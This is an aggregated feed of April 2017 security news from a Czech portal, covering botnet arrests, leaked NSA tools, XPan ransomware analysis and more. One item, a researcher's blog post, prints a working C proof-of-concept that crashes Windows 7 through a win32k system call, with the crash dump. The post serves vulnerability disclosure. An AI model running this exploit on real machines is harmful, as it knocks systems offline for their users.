Security-Portal.cz je internetový portál zaměřený na počítačovou bezpečnost, hacking, anonymitu, počítačové sítě, programování, šifrování, exploity, Linux a BSD systémy. Provozuje spoustu zajímavých služeb a podporuje příznivce v zajímavých projektech.

Kategorie

The Cloud Foundry Approach to Container Storage and Security

LinuxSecurity.com - 24 Duben, 2017 - 12:06
LinuxSecurity.com: Recently, The New Stack published an article titled "Containers and Storage: Why We Aren't There Yet" covering a talk from IBM's James Bottomley at the Linux Foundation's Vault conference in March. Both the talk and article focused on one of the central problems we've been working to address in the Cloud Foundry Foundation's Diego Persistence project team, so we thought it would be a good idea to highlight the features we've added to mitigate it.
Kategorie: Hacking & Security

Russian hacker arrested in Spain for bot-herding not election-fiddling

LinuxSecurity.com - 24 Duben, 2017 - 12:03
LinuxSecurity.com: Last week ended badly for Russian hackers. The United States Department of Justice revealed that Peter Yuryevich Levashov was picked up in Barcelona a couple of weeks back for his association with the Kelihos botnet. Levashov said he'd been told the arrest was due to his creation of a virus in some way linked to the Russia's suspected interference in the recent US presidential election.
Kategorie: Hacking & Security

Windows Kernel Local Denial-of-Service #5: win32k!NtGdiGetDIBitsInternal (Windows 7-10)

j00ru//vx tech blog - 24 Duben, 2017 - 11:39

Today I’ll discuss yet another way to bring the Windows operating system down from the context of an unprivileged user, in a 5th and final post in the series. It hardly means that this is the last way to crash the kernel or even the last way that I’m aware of, but covering these bugs indefinitely could soon become boring and quite repetitive, so I’ll stop here and return with other interesting material in the near future. Links to the previous posts about Windows DoS issues are listed below:

The bug explained today can be found in the win32k!NtGdiGetDIBitsInternal system call, which has been around since the very early days of Windows existence (at least Windows NT). The syscall is used by the GetDIBits, BitBlt and StretchBlt documented API functions, and has been recently subject to patching in Microsoft’s April Patch Tuesday, in order to fix an unrelated double-fetch vulnerability reported by Project Zero (CVE-2017-0058, issue #1078 in the tracker). The DoS problem was also reported to the vendor at that time, but due to its low severity, it didn’t meet the bar for a security bulletin.

The purpose of the function is to acquire bitmap data based on a Device Context, HBITMAP object, starting scan line, number of scan lines, a BITMAPINFO header and an output buffer. This is illustrated by the following function declaration present in the ReactOS sources:

INT APIENTRY NtGdiGetDIBitsInternal( _In_ HDC hdc, _In_ HBITMAP hbm, _In_ UINT iStartScan, _In_ UINT cScans, _Out_writes_bytes_opt_(cjMaxBits) LPBYTE pjBits, _Inout_ LPBITMAPINFO pbmi, _In_ UINT iUsage, _In_ UINT cjMaxBits, _In_ UINT cjMaxInfo)

This declaration suggests that a maximum of cjMaxBits bytes can be written to the pjBits output memory area. The conclusion seems to be correct after taking a look at the actual implementation of the function in win32k.sys, where we can find the following code snippet:

As shown above, if the value of the cjMaxBits argument is non-zero, it is prioritized over the return value of the GreGetBitmapBitsSize routine. It is also interesting to note that after performing an initial validation of the pjBits pointer with a ProbeForWrite call, the user-mode memory region spanning from pjBits to pjBits+cjMaxBits-1 is locked, so it cannot be unmapped or restricted beyond the PAGE_READWRITE access rights. By doing so, the kernel makes sure that all subsequent read/write accesses to that area are safe (i.e. won’t trigger an exception) until a corresponding MmUnsecureVirtualMemory call, which in turn allows it to skip setting up a very broad try/except block over the entire logic of the system call, or using a temporary buffer. On the other hand, the logic is very reliant on the specific number of bytes being locked in memory, so if the kernel later tries to dereference even a single byte outside of the secured user-mode region, it is risking triggering an unhandled exception and an accompanying Blue Screen of Death.

The core of the syscall logic resides in an internal GreGetDIBitsInternal function:

which further calls GreGetDIBitsInternalWorker. In that routine, the bitmap pixels actually copied into the user-mode output buffer. One special corner case is when the caller requests the output data to be RLE-compressed through the pbmi->bmiHeader.biCompression field, which yields the following additional calls to EncodeRLE4 or EncodeRLE8:

 Here, the 2nd argument is the pointer to locked user-mode memory, and the 5th argument is the maximum number of bytes which can be written to it. The inconsistency is quite obvious: while NtGdiGetDIBitsInternal uses cjMaxBits (if it’s non-zero) as the maximum buffer length, the internal EncodeRLE functions use another value passed through an input structure field (bmi->bmiHeader.biSizeImage). If the former is smaller than the latter, and the size of the requested data is sufficiently large, it is possible to make EncodeRLE access bytes outside of the protected region, thus generating the desired unhandled kernel exception. Notably, this condition can only lead to a local DoS, since the buffer overflow is linear, and the buffer itself is guaranteed to be located in ring-3 memory with the initial ProbeForWrite call. Nonetheless, I find the flaw interesting, as it demonstrates the importance of consistency in kernel data processing, especially where buffer lengths are involved.

A functional proof-of-concept code is quite simple and can be found below. It works on Windows 7 32-bit (due to a hardcoded syscall number) and expects an input bitmap in the test.bmp file. We used a 100 x 100 x 24bpp white image for testing purposes. The essence of the bug is visible in lines 42 and 57 – only a single byte of the output buffer is secured, but the kernel may write as many as 0x10000000.

#include <Windows.h> #include <assert.h> // For native 32-bit execution. extern "C" ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { __asm{mov eax, ApiNumber}; __asm{lea edx, ApiNumber + 4}; __asm{int 0x2e}; } int main() { // Windows 7 32-bit. CONST ULONG __NR_NtGdiGetDIBitsInternal = 0x10b3; // Initialize the graphic subsystem for this process. LoadLibraryA("gdi32.dll"); // Load an external bitmap as HBITMAP and select it in the device context. HDC hdc = CreateCompatibleDC(NULL); HBITMAP hbmp = (HBITMAP)LoadImage(NULL, L"test.bmp", IMAGE_BITMAP, 0, 0, LR_LOADFROMFILE); assert(hdc != NULL); assert(hbmp != NULL); SelectObject(hdc, hbmp); // Allocate a 4-byte buffer for the output data. LPBYTE lpNewRegion = (LPBYTE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); assert(lpNewRegion != NULL); memset(lpNewRegion, 0xcc, 0x1000); LPBYTE output_buffer = &lpNewRegion[0xffc]; // Trigger the vulnerability. BITMAPINFOHEADER bmi = { sizeof(BITMAPINFOHEADER), // biSize 100, // biWidth 100, // biHeight 1, // biPlanes 8, // biBitcount BI_RLE8, // biCompression 0x10000000, // biSizeImage 0, // biXPelsPerMeter 0, // biYPelsPerMeter 0, // biClrUsed 0, // biClrImportant }; SystemCall32(__NR_NtGdiGetDIBitsInternal, hdc, hbmp, 0, 1, output_buffer, &bmi, DIB_RGB_COLORS, 1, sizeof(bmi) ); return 0; }

Starting the program gives us the expected result in the form of a BSoD:

The full crash summary is as follows:

KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e) This is a very common bugcheck. Usually the exception address pinpoints the driver/function that caused the problem. Always note this address as well as the link date of the driver/image that contains this address. Some common problems are exception code 0x80000003. This means a hard coded breakpoint or assertion was hit, but this system was booted /NODEBUG. This is not supposed to happen as developers should never have hardcoded breakpoints in retail code, but ... If this happens, make sure a debugger gets connected, and the system is booted /DEBUG. This will let us see why this breakpoint is happening. Arguments: Arg1: c0000005, The exception code that was not handled Arg2: 8ef2584c, The address that the exception occurred at Arg3: 949e19a0, Trap Frame Arg4: 00000000 Debugging Details: ------------------ EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. FAULTING_IP: win32k!EncodeRLE8+1ac 8ef2584c c60300 mov byte ptr [ebx],0 TRAP_FRAME: 949e19a0 -- (.trap 0xffffffff949e19a0) ErrCode = 00000002 eax=000f1002 ebx=000f1000 ecx=00000004 edx=fb8d4f61 esi=00000064 edi=fb8d4efc eip=8ef2584c esp=949e1a14 ebp=949e1a40 iopl=0 nv up ei ng nz ac pe cy cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010297 win32k!EncodeRLE8+0x1ac: 8ef2584c c60300 mov byte ptr [ebx],0 ds:0023:000f1000=?? Resetting default scope DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT BUGCHECK_STR: 0x8E PROCESS_NAME: usermode_oob_w CURRENT_IRQL: 2 ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre LAST_CONTROL_TRANSFER: from 816f3dff to 8168f9d8 STACK_TEXT: 949e0f5c 816f3dff 00000003 c890b2ef 00000065 nt!RtlpBreakWithStatusInstruction 949e0fac 816f48fd 00000003 949e13b0 00000000 nt!KiBugCheckDebugBreak+0x1c 949e1370 816f3c9c 0000008e c0000005 8ef2584c nt!KeBugCheck2+0x68b 949e1394 816c92f7 0000008e c0000005 8ef2584c nt!KeBugCheckEx+0x1e 949e1930 81652996 949e194c 00000000 949e19a0 nt!KiDispatchException+0x1ac 949e1998 8165294a 949e1a40 8ef2584c badb0d00 nt!CommonDispatchException+0x4a 949e1a40 8eddaf69 fb8d4f61 ff0f0ffc 00000064 nt!KiExceptionExit+0x192 949e1b04 8edf8c05 00000028 949e1b5c 949e1b74 win32k!GreGetDIBitsInternalWorker+0x73e 949e1b7c 8ede39cc 06010327 0905032f 00000000 win32k!GreGetDIBitsInternal+0x21b 949e1c08 81651db6 06010327 0905032f 00000000 win32k!NtGdiGetDIBitsInternal+0x250 949e1c08 00e45ba6 06010327 0905032f 00000000 nt!KiSystemServicePostCall

Thanks for reading!

XPan, I am your father

Kaspersky Securelist - 24 Duben, 2017 - 10:55

While we have previously written on the now infamous XPan ransomware family, some of it’s variants are still affecting users primarily located in Brazil. Harvesting victims via weakly protected RDP (remote desktop protocol) connections, criminals are manually installing the ransomware and encrypting any files which can be found on the system.

Interestingly, this XPan variant is not necessarily new in the malware ecosystem. However, someone has chosen to keep on infecting victims with it, encouraging security researchers to hunt for samples related to the increasing number of incident reports. This sample is what could be considered as the “father” of other XPan ransomware variants. A considerable amount of indicators within the source code depict the early origins of this sample.

“Recupere seus arquivos aqui.txt” loosely translated to “recover your files here” is a phrase that not many Brazilian users are eager to see in their desktops.

The ransomware author left a message for Kaspersky in other versions and has done the same in this one, with traces to the NMoreira “CrypterApp.cpp” there’s a clear link between different variants among this malware family.

NMoreira, XPan, TeamXRat, different names but same author.

Even though many Brazilian-Portuguese strings are present upon initial analysis, there were a couple that caught our attention. Firstly, the ransomware uses a batch file which will pass a command line parameter to an invoked executable file, this parameter is “eusoudejesus” which means “I’m from Jesus”. Developers tend to leave tiny breadcrumbs of their personality behind in each one of their creations, and in this sample we found many of them.

A brief religious reference found in this XPan variant.

Secondly, a reference to a Brazilian celebrity is done, albeit indirectly. “Computador da Xuxa” was a toy computer sold in Brazil during the nineties, however it’s also a popular expression which is used to make fun of very old computers with limited power.

This is what cybercriminals think of your encrypted computer: just a toy they can control.

“Muito bichado” equals to finding a lot of problems in these type of systems, in this case meaning that the environment in which is XPan is executing is not playing fair and the execution is quite buggy.

Lastly, we have the ransomware note demanding the victim to send an email to the account ‘one@proxy.tg’. Considering that the extension for all the encrypted files in this variant is ‘.one’ this seems like a pretty straightforward naming convention for the criminals’ campaigns.

The rescue note in Portuguese.

Upon closer inspection, we discovered that this sample is nearly identical to another version of Xpan which used to be distributed back in November 2016 and used the extension “.__AiraCropEncrypted!”. Every bit of executable code remains the same, which is quite surprising, because since that time there were several newer versions of this malware with an updated encryption algorithm. Both samples have the same PE timestamp dating back to the 31st of October 2016.

The only difference between the two is the configuration block which contains the following information:

  • list of target file extensions;
  • ransom notes;
  • commands to execute before and after encryption;
  • the public RSA key of the criminals.

The decrypted configuration block of Xpan that uses the extension “.one”.

The file encryption algorithm also remains the same. For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the API CryptDeriveKey, and proceeds to encrypt the file contain using AES-256 in CBC mode with zero IV. The string S will be encrypted using the criminals’ RSA public key from the configuration block and stored in the beginning of the encrypted file.

According to one of the victims that contacted us, criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as they did with before: the user sends a message to a mailbox with his unique ID and patiently awaits for further instructions.

The victims so far are small and medium businesses in Brazil: ranging from a dentist clinic to a driving school, demonstrating once again that ransomware makes no distinctions and everyone is at risk. As long as there are victims, assisting them and providing decryption tools whenever possible is necessary, no matter the ransomware family or when it was created.

Victims: we can help

This time luck is on the victims’ side! Upon thorough investigation and reverse engineering of the sample of “.one” version of Xpan, we discovered that the criminals used a vulnerable cryptographic algorithm implementation. It allowed us to break encryption as with the previously described Xpan version.

We successfully helped a driving school and a dentist clinic to recover their files for free and as usual we encourage victims of this ransomware to not pay the ransom and to contact our technical support for assistance in decryption.

Brazilian cybercriminals are focusing their efforts in creating new and local ransomware families, attacking small companies and unprotected users. We believe this is the next step in the ransomware fight: going from global scale attacks to a more localized scenario, where local cybercriminals will create new families from scratch, in their own language, and resorting to RaaS (Ransomware-as-a-service) as a way to monetize their attacks.

MD5 reference

dd7033bc36615c0fe0be7413457dccbf – Trojan-Ransom.Win32.Xpan.e (encrypted file extension: “.one”)
54217c1ea3e1d4d3dc024fc740a47757 – Trojan-Ransom.Win32.Xpan.d (encrypted file extension: “.__AiraCropEncrypted!”)

Monday review – the hot 18 stories of the week

Sophos Naked Security - 24 Duben, 2017 - 10:28
From Burger King's Google Home trigger and how tech scammer have made millions to the many vulnerabilities found in Linksys routers, & more!

Umělá inteligence je sice v plenkách, už teď ale přestáváme rozumět, jak vlastně funguje. To je problém

Zive.cz - bezpečnost - 24 Duben, 2017 - 09:46
** Už je to tady, lidé přestávají chápat počítače ** Systémy neuronových sítí začínají pracovat tak, že ani jejich tvůrci přesně neví, co se uvnitř děje ** Do budoucna to může být závažný problém
Kategorie: Hacking & Security

Rusko špehovalo e-maily příslušníků dánské armády

Novinky.cz - bezpečnost - 24 Duben, 2017 - 08:52
Rusko pomocí skupiny hackerů proniklo do systémů dánské armády a v letech 2015 a 2016 mělo přístup k e-mailům některých jejích příslušníků. Informoval o tom v neděli dánský list Berlingske s odvoláním na dánského ministra obrany Clause Hjorta Frederiksena.
Kategorie: Hacking & Security

The Unhappy Boss

InfoSec Institute Resources - 24 Duben, 2017 - 00:52

Large organizations have an added pressure of having so much organizational information publicly available on the Internet. If an attacker has performed due diligence during the planning phase it would be possible they could find organizational information such as employees, roles, and reporting structures – this is especially true for larger companies. This information can […]

The post The Unhappy Boss appeared first on InfoSec Resources.

Kategorie: Hacking & Security

Zákeřná Karmen: Tento ransomware by dokázala ovládat i vaše babička

Zive.cz - bezpečnost - 23 Duben, 2017 - 19:00
** Jak složité je spustit ransomwarovou kampaň? ** Karmen spíše než malware připomíná CRM systém ** Ve webovém rozhraní se vyzná každý
Kategorie: Hacking & Security

Please Volunteer

InfoSec Institute Resources - 23 Duben, 2017 - 00:46

A successful phishing campaign has at least three common denominators, which are accurate target information, successful message delivery, and execution of the malicious intent on the client side. Often time’s phishing is thought of as a user exploit only, but the fact of the matter is that phishing exploitation requires the breakdown of several controls […]

The post Please Volunteer appeared first on InfoSec Resources.

Kategorie: Hacking & Security

Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs

The Hacker News - 22 Duben, 2017 - 17:13
Script kiddies and online criminals around the world have reportedly started exploiting NSA hacking tools leaked last weekend to compromise hundreds of thousands of vulnerable Windows computers exposed on the Internet. Last week, the mysterious hacking group known as Shadow Brokers leaked a set of Windows hacking tools targeting Windows XP, Windows Server 2003, Windows 7 and 8, and Windows
Kategorie: Hacking & Security

SMSVova Spyware Hiding in ‘System Update’ App Ejected From Google Play Store

Threatpost - 22 Duben, 2017 - 14:00
An Android app that falsely claimed to be a tool for keeping smartphones up-to-date with the latest version of the OS was found surreptitiously tracking the physical location of it users using spyware called SMSVova.
Kategorie: Hacking & Security

US Court Sentences Russian Lawmaker's Son to 27 Years in Jail for Hacking

The Hacker News - 22 Duben, 2017 - 12:25
The son of a prominent Russian lawmaker was sentenced on Friday by a US federal court to 27 years in prison after being convicted of stealing millions of US credit card numbers and causing some $170 million in damages to businesses and individuals. This sentence is so far the longest sentence ever imposed in the United States for a hacking-related case. Roman Valeryevich Seleznev, 32, the
Kategorie: Hacking & Security

Americký soud poslal ruského hackera na 27 let do vězení

Novinky.cz - bezpečnost - 22 Duben, 2017 - 11:37
Soud v americkém Seattlu v pátek poslal na 27 let do vězení ruského hackera Romana Selezňova, který internetovými krádežemi kreditních karet a dalšími online podvody způsobil škody ve výši 169 milionů dolarů (4,2 miliardy korun). Podle amerických právníků jde o zatím nejvyšší trest, který byl v USA za podobné zločiny vyměřen.
Kategorie: Hacking & Security

Russian man gets longest-ever US hacking sentence, 27 years in prison

Ars Technica - 22 Duben, 2017 - 02:19

Images of Seleznev with stacks of cash were found on his laptop following his 2014 arrest in the Maldives. (credit: Department of Justice)

Russian hacker Roman Seleznev was sentenced to 27 years in prison today. He was convicted of causing more than $169 million in damage by hacking into point-of-sale computers.

Seleznev, aka "Track2," would hack into computers belonging to both small businesses and large financial institutions, according to prosecutors. He was arrested in the Maldives in 2014 with a laptop that had more than 1.7 million credit card numbers. After an August 2016 trial, Seleznev was convicted on 38 counts, including wire fraud, intentional damage to a protected computer, and aggravated identity theft.

The sentence is quite close to the 30 years that the government asked for. Prosecutors said Seleznev deserved the harsh sentence because he was "a pioneer" who helped grow the market for stolen credit card data and because he "became one of the most revered point-of-sale hackers in the criminal underworld."

Read 6 remaining paragraphs | Comments

Kategorie: Hacking & Security

Invitation to a Compromise

InfoSec Institute Resources - 22 Duben, 2017 - 00:39

It is possible that your organization can be phished by avenues other than email. Social-engineering attacks are part technical but mostly psychological and the more creative the attacker, the better the probability of a successful the attack. A delivery method that isn’t typical but is growing in popularity, as of late is phishing over meeting […]

The post Invitation to a Compromise appeared first on InfoSec Resources.

Kategorie: Hacking & Security

>10,000 Windows computers may be infected by advanced NSA backdoor

Ars Technica - 21 Duben, 2017 - 22:12

Enlarge / A script scanning the Internet for computers infected by DoublePulsar. On the left, a list of IPs Shodan detected having the backdoor installed. On the right are pings used to manually check if a machine is infected. (credit: Dan Tentler)

Security experts believe that tens of thousands of Windows computers may have been infected by a highly advanced National Security Agency backdoor. The NSA backdoor was included in last week's leak by the mysterious group known as Shadow Brokers.

DoublePulsar, as the NSA implant is code-named, was detected on more than 107,000 computers in one Internet scan. That scan was performed over the past few days by researchers from Binary Edge, a security firm headquartered in Switzerland. Binary Edge has more here. Separate mass scans, one done by Errata Security CEO Rob Graham and another by researchers from Below0day, detected roughly 41,000 and 30,000 infected machines, respectively. To remain stealthy, DoublePulsar doesn't write any files to the computers it infects. This design prevents it from persisting after an infected machine is rebooted. The lack of persistence may be one explanation for the widely differing results.

Below0day

Read 5 remaining paragraphs | Comments

Kategorie: Hacking & Security

Skype Fixes ‘SPYKE’ Credential Phishing Remote Execution Bug

Threatpost - 21 Duben, 2017 - 22:00
Microsoft fixed a bug in Skype last month that could have allowed an attacker to execute code on the system it was running on, phish Skype credentials and crash the application.
Kategorie: Hacking & Security

News in brief: Google Home gets smarter; Hackers target South Korean missiles; Harry Huskey dies

Sophos Naked Security - 21 Duben, 2017 - 19:56
Your daily round-up of some of the other stories in the news
Syndikovat obsah